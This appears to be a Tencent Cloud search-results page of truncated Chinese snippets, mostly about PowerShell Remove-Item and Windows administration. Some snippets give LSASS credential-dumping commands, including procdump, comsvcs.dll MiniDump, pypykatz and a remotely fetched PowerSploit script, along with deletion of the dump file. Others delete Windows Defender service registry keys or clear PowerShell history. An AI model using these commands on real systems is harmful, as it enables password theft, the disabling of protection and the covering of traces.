#Histroy : # 2013/9/6 get-service **获得服务信息命令 echo "List the service that stopped " Get-Service | Where-Object...**创建以文件夹 mkdir C:\test\tst new-item C:\test\tst -type directory ls remove-item tst -recurse echo "...Cmdlet " **删除文件操作命令 echo "remve file " new-item C:\test\tst.txt -type file ls remove-item tst.txt -...C:\test\*.vbs -whatif rm *.vbs echo "After remove :" ls echo "Move a file or folder " **移动文件操作命令 new-item...echo "After move " ls Move-Item c:\test\hello.txt c:\ -force echo "rename file or folder" **重命名文件命令
1、什么是高级参数所谓的高级参数就是针对那些可以完成执行命令之外还可以提供其他高级功能的参数(比如显示执行命令的信息、针对错误信息的处理方式、命令出现警告情况的处理方式等等)。...使用较多的是New、Set、Remove等动词命令支持高级参数的命令方式。下面给大家逐一介绍这些高级参数。...PS D:\logs> remove-item 端午节2.txt -debug确认是否确实要执行此操作?正在目标“D:\logs\端午节2.txt”上执行操作“删除文件”。...然后再执行remove-item 端午节2.txt -ErrorAction Continue输出如下错误信息remove-item : 找不到路径“D:\logs\端午节2.txt”,因为该路径不存在...$Error输出了错误信息remove-item : 找不到路径“D:\logs\端午节2.txt”,因为该路径不存在。
https://cloud.tencent.com/developer/article/2355810 3、禁用系统自带的部分计划任务 【获取】 以Administrator身份运行powershell命令获取可能影响渲染的计划任务列表...PsExec.exe https://live.sysinternals.com/PsExec64.exe 下载后放到服务器C:\Windows\System32目录下 然后以Administrator身份在cmd命令行执行...exe -accepteula -nobanner -i -s cmd 会打开一个有system权限(比Administrator权限大)的powershell窗口来执行如下禁用可能影响渲染的计划任务的命令...-Path "$tempPath\*" -Recurse -Force 2>&1 > $null $tempPath2 = "C:\Windows\Temp" Remove-Item -Path "$...tempPath2\*" -Recurse -Force 2>&1 > $null Remove-Item (Get-PSReadlineOption).HistorySavePath 2>$null
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...DotNetCore.WindowsHosting之后,要重启IIS服务 Invoke-Expression "net stop was /y" Invoke-Expression "net start w3svc" 可以使用以下命令来检测...最后就可以打开浏览器进行访问了 Invoke-Expression "cmd.exe /C start http://localhost:8080" 完整脚本 以上是在用PowerShell部署到IIS时的关键命令...if(Test-Path -Path "DotNetCore.WindowsHosting.exe") { Remove-Item -Path "DotNetCore.WindowsHosting.exe...-OutFile "ZKEACMS.zip" Write-Host "Unzip ZKEACMS application package." if(Test-Path "ZKEACMS") { Remove-Item
1、New-Item 创建新项命令cmdlet New-Item 将创建新项并设置其值。 可创建的项类型取决于项的位置。 例如,在文件系统 New-Item 中创建文件和文件夹。...2、Remove-Item 删除项命令Remove-Item cmdlet 删除一个或多个项。它支持删除许多不同类型的项,包括文件、文件夹、注册表项、变量、别名和函数。...删除当前目录的demo.txt文件Remove-item demo.txt删除当前目录所有扩展名是jpg的文件,文件名不包括*test*的文件Remove-Item * -Include *.jpg -...包含某个字符串,支持通配符-Exclude:排除某个字符串,支持通配符 使用递归的方式删除当前目录和子目录中所有的txt文件Get-ChildItem * -Include *.txt -Recurse | Remove-Item...3、Rename-Item 项重命名该命令主要是用来给项目进行重命名,支持文件、目录、注册表等文件类型,并且也可以批量重命名操作。
示例:移除一个不存在的 端午节2.txt命令如下:remove-item 端午节2.txt -ErrorVariable CurrError$CurrError #输出错误信息#再执行一遍remove-item... 端午节2.txt -ErrorVariable CurrError $CurrError #输出错误信息 #发现错误信息没有新增为两条# 给命令增加+号 实现错误信息追加remove-item 端午节...Tee-Object比较类似,把当前命令的执行结果输出到定义的变量当中去,然后在命令结果传递到管道的同时,把执行结果保存到PowerShell变量中去。...使用 PipelineVariable 允许任何管道命令访问 (传递的管道值,并) 由上一个命令以外的命令保存。 管道命令可以在处理通过管道的下一项时访问从中传递的最后一个值。...示例第一个Foreach-Object命令的结果通过管道传递到第二Foreach-Object个命令中,该命令显示 和 $_的$temp当前值。
driverid=nmhv4②然后cmd管理员权限执行如下命令补丁安装:md c:\tempcd /d "c:\temp"expand -f:* c:\temp\Windows10.0-KB4565511...方案二①powershell管理员权限执行如下2句powershell命令安装提权工具advancedrun:wget http://www.nirsoft.net/utils/advancedrun-x64...(有风险,建议先做快照备份,以备不时之需回滚数据):Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Component...Based Servicing\Packages\*KB4565511*"Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion...\Component Based Servicing\Packages\*KB4586830*"Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion
我们不可能每次运行程序时,都向命令行输入这么长一串命令,于是我想到: 把这个过程写在 makefile 里?...(win 10 上 make 命令报错,遂放弃) 把 gecode 的 includePath 和 libPath 放到 环境变量 include 和 lib 里?.../$filename.obj) { Remove-Item ./$filename.obj } if (Test-Path ..../$filename.exe) { Remove-Item ./$filename.exe } try { Write-Output "compile..."...当我有一个脚本 abc.cpp ,我只需要在命令行输入 test abc 就可以自动 编译->链接->运行C++文件abc.cpp了!
对服务端机器(被远程的机器),除过termservice服务正常运行、远程端口正常监听外,还要额外以管理员身份执行一句powershell命令: winrm quickconfig -q 2>&1> $...以下代码兼容server2008r2/2012r2/2016/2019/2022 对客户端机器,如果5985端口不在会报错 powershell命令: reg delete "HKLM\SOFTWARE...mpssvc start= disabled #reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRM" /f 2>&1 >$null Remove-Item...before Set-ExecutionPolicy as it throws an error #$ErrorActionPreference = "stop" # Remove listener Remove-Item...powershell执行Set-Item WSMan:localhost\client\trustedhosts -value * -force 2>&1 > $null 然后以管理员身份打开cmd,执行下面命令看看是否报错
前提:需要管理员及以上权限 常用命令: procdump -accepteula -ma lsass.exe lsass_dump 导出的.dmp文件本地配合minikatz 取出密码 sekurlsa...前提:在powershell中运行,管理员权限以上 命令: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump...(Get-Process lsass).id $env:TEMP\lsass.dmp full 清理: Remove-Item $env:TEMP\lsass.dmp -ErrorAction Ignore...前提:必须安装python3,管理员权限以及以上 命令: #安装 pip install pypykatz #使用 pypykatz live lsa 抓得不只是lsass,还有其他的。...mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump” 清除文件: Remove-Item
对服务端机器(被远程的机器),除过termservice服务正常运行、远程端口正常监听外,还要额外以管理员身份执行一句powershell命令: winrm quickconfig -q 2>&1> $...以下代码兼容server2008r2/2012r2/2016/2019/2022 对客户端机器,如果5985端口不在会报错 powershell命令: reg delete "HKLM\SOFTWARE...mpssvc start= disabled #reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRM" /f 2>&1 >$null Remove-Item...before Set-ExecutionPolicy as it throws an error #$ErrorActionPreference = "stop" # Remove listener Remove-Item...Web-Application-Proxy"} | Install-WindowsFeature; } } 上面黑体的部分就是要批量下发的指令,多行的话用英文分行隔开,比如要批量下发停止云监控组件和禁止云监控组件开机运行的命令
参考https://blog.csdn.net/u013761036/article/details/71915237 关闭了135端口 主要应该是加Rpc\internet注册表导致的 加的时候执行命令也可以加...:reg add HKLM\SOFTWARE\Microsoft\Rpc\internet 删的时候得手动循着路径去删除或者执行这句命令去删除 powershell -Command "Remove-Item
ChromeSetup.exe") -eq $True ){del "C:\Users\Administrator\Desktop\ChromeSetup.exe" 2>&1 > $nullstart-sleep 5}Remove-Item...Path\$Installer")Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait;Remove-Item...Path\$Installer;Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait;Remove-Item...chrome_installer.exe",$Path);Start-Process -FilePath $Path -Args "/silent /install" -Verb RunAs -Wait;Remove-Item...chrome_installer.exe" -OutFile $Path;Start-Process -FilePath $Path -Args "/silent /install" -Verb RunAs -Wait;Remove-Item
1、配置进安全模式 以管理员身份打开CMD命令行运行以下两条命令行开启高级选项 CMD命令行 bcdedit /set {default} advancedoptions on bcdedit /set...在弹出的powershell窗口中运行如下命令删除WinDefend的注册表 Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend..." 2>$null 或者 Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Recurse -force -Confirm...WinDefend)已经消失了 如法炮制,也可以干掉Microsoft Defender Antivirus Network Inspection Service(WdNisSvc) 先提权,然后执行 Remove-Item...-Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" 2>$null 或者 Remove-Item -Path "HKLM:\SYSTEM\
不像以前,如果什么都不带就来实验室,虽然有屏幕,有主机,但是打开屏幕,里面只有命令行,字体还没有显示完全2333。...但是我对过去3个月的实验室主机的Ubuntu Server是十分满意的,我已经很久没有用wsl了,因为只要一句ssh命令就能连接到实验室主机。...Get-ChildItemColorSet-PoshPrompt -Theme M365Princess$env:PYTHONIOENCODING="utf-8"# Remove curl aliasIf (Test-Path Alias:curl) {Remove-Item...Alias:curl}If (Test-Path Alias:curl) {Remove-Item Alias:curl}function GoBack {Set-Location ..}# Remove-Item
描述: md 命令是New-Item 命令别名....命令 - 将项的值更改为命令中指定的值。...Remove-ItemProperty 命令 - 设置键的值 描述: del 是Remove-Item的别名....C:\Test\*.* # == Del C:\Test\*.* Remove-Item -Path C:\Test\file.txt -Force # 2.删除特殊条件的文件或者目录 Remove-Item...如果Tee对象是管道中的最后一个命令,则命令输出将显示在提示处(类似于Linux中的tee命令)。
如果C分区和空白空间之间无其他分区、且不想重启,那就手动执行powershell命令: $DiskOps=@" select disk 0 select volume c extend exit "@...要么手动扩展卷,要么执行命令扩展卷,相对保险一些(都是人为)。 总有各种特殊情况,人为check是必要的。...mpssvc start= disabled #reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRM" /f 2>&1 >$null Remove-Item...before Set-ExecutionPolicy as it throws an error #$ErrorActionPreference = "stop" # Remove listener Remove-Item...cmd.exe /c sc config winrm start= auto cmd.exe /c net start winrm netstat -ato|findstr ":5985 :5986" #Remove-Item
chrome_installer.exe",$Path); Start-Process -FilePath $Path -Args "/silent /install" -Verb RunAs -Wait; Remove-Item...OutFile $Path; Start-Process -FilePath $Path -Args "-ms /MaintenanceService=false /DesktopShortcut=true"; Remove-Item...MsiExec.exe /i $Path INSTALL_MAINTENANCE_SERVICE=false DESKTOP_SHORTCUT=true /qn start-sleep -s 60 Remove-Item...Start-Process -FilePath $Path -Args "-ms /MaintenanceService=false /DesktopShortcut=true" start-sleep -s 60 Remove-Item...chrome_installer.exe",$Path); Start-Process -FilePath $Path -Args "/silent /install" -Verb RunAs -Wait; Remove-Item
://blog.csdn.net/u013761036/article/details/71915237这篇文档关闭135、139、445端口的办法适用所有Windows系统,但是太过繁琐,我翻译成了命令所有...SOFTWARE\Microsoft\Rpc" /v "DCOM Protocols" /t reg_multi_sz /d "ncacn_ip_tcp\0" /fpowershell -Command "Remove-Item...Rpc\Internet -force -Confirm:0"或powershell -Command "Get-Item HKLM:\SOFTWARE\Microsoft\Rpc\Internet | Remove-Item...-force -Confirm:0"以上复原135端口的命令适用所有Windows系统下面单独说下reg delete命令执行reg delete "HKLM\SOFTWARE\Microsoft\Rpc
0x01简介 本文将要介绍以下内容: 1.两种PowerShell的命令的历史记录 2.导出PowerShell的命令历史记录的方法 3.防御建议 0x02两种Powershell命令的历史记录 记录PowerShell...).HistorySavePath 清除命令的历史记录: Remove-Item (Get-PSReadlineOption).HistorySavePath 2.利用思路 获得了视窗系统的访问权限...如果系统是Powershell v3或Powershell v4,可通过命令行安装PSReadLine,这样就能记录后续系统所有的Powershell命令。...\PowerShell\PSReadline\ConsoleHost_history.txt 清除命令的历史记录: Remove-Item (Get-PSReadlineOption).HistorySavePath...对于低版本的Powershell的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除,命令为:Clear-History 对于cmd.exe的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
